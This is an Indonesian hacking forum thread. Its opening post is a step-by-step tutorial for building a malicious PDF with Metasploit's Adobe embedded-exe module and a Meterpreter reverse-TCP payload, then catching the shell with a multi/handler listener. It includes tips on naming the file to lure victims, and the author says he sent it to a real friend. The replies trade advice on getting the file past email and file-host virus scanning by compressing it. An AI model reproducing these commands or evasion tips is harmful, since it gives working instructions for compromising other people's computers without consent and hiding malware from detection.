[Share] Exploit Using Adobe PDF With Metasploit
#1
Oke guys pagi ini saya akan membuat tutorial Exploit Using PDF with Metasploit, berikut bahan-bahan yang diperlukan guys :

[Image: Screenshot_1.png]

Level : Medium, Hard

Testing : Win XP SP3, Windows 7

Vulnerable Application Testing : Adobe Reader 9.1

Requirement :

1. Metasploit Framework

2. Windows or Linux OS(I'm using Kali Linux in this tutorial)


Berikut ini tahap-tahapannya :

Buka terminal anda dan ketikan ini:

Code:
service postgresql start
service metasploit start
msfconsole

[Image: Screenshot_2.png]

setelah terbuka metasploit anda ketikan ini:

Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
set payload windows/meterpreter/reverse_tcp
set filename tugas.pdf
set lhost 192.168.1.100
set lport 443
exploit

Keterangan:
use exploit Use adobe pdf embedded exe exploit
set payload window set the payload to return meterpreter script when exploit successfully performed
set filename tugas.pdf --> Membuat file ini semenarik Anda sehingga korban akan membuka PDF berbahaya Anda.
set lhost 192.168.1.100 --> Ip Anda
set lport 443 --> Saya menggunakan port ini (443 selalu terbuka: p)
exploit --> menghasilkan PDF berbahaya

[Image: Screenshot_3.png]


Setelah berhasil menghasilkan PDF, itu akan disimpan di komputer lokal Anda buka folder home CTRL+H /root/.msf4/local/(nama pdf)
Langkah selanjutnya adalah mengirimkan pdf kita untuk menargetkan ke korban, terserah mau pakai teknik apa jg bro yang penting file pdf sampai dikomputer korban. Dalam hal ini saya akan kirimkan ke teman saya ma*******@gmail.com kebetulan teman ane masih pakai wedus XP.

setelah file kita berada di pc korban tinggal ketikan ini di terminal:

Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.1.100 (ip anda)
exploit

[Image: Screenshot_4.png]

dan gotcha ane dapet sessionnya setelah teman ane membuka pdfnya Smile
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer


#2
jadi script kiddies skali thanks
test coba dolo
btw ntar pdf dia download
dan sukses
dia open ktia dpt apaan nya
itu di terminal ane gak tau bro

#3
dan ane test pake mediafire yahoo gmail selalu ke dectect virus
fix in itu gmna ya bang

#4
(05-18-2015, 10:06 PM)Hendra Gunawan Wrote: dan ane test pake mediafire yahoo gmail selalu ke dectect virus
fix in itu gmna ya bang

Compress file nya sudah?
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#5
(05-18-2015, 10:06 PM)Hendra Gunawan Wrote: dan ane test pake mediafire yahoo gmail selalu ke dectect virus
fix in itu gmna ya bang

compress dulu bro pakai winrar Smile
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer


#6
compres winrar
kalo di linux gmna
winrar nya
setahu gw cuma zip tar.gz
7z
test ubah ke rar gak ada , apa harus ke windust dolo

#7
dan setelah saya comprize
tetap saja
dibaca virus
mohon bantuan nya Big Grin

#8
mau tanya om,kalo' victim udah buka itu file pdf lalu di close apakah masih bisa terexploit om?
terimakasih Big Grin

#9
(05-26-2015, 01:44 AM)saputro default Wrote: mau tanya om,kalo' victim udah buka itu file pdf lalu di close apakah masih bisa terexploit om?
terimakasih Big Grin

sekedar bantu jawab, kalo session sudah dapat, di close PDFnya pun gk masalah .
asal mesin target jngn mati.. beda kasusnya kalau kita udah upload BD

#10
(05-27-2015, 09:18 PM)drewcode Wrote: sekedar bantu jawab, kalo session sudah dapat, di close PDFnya pun gk masalah .
asal mesin target jngn mati..  beda kasusnya kalau kita udah upload BD

terima kasih om udah bantu jawab Smile
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer







Users browsing this thread: 1 Guest(s)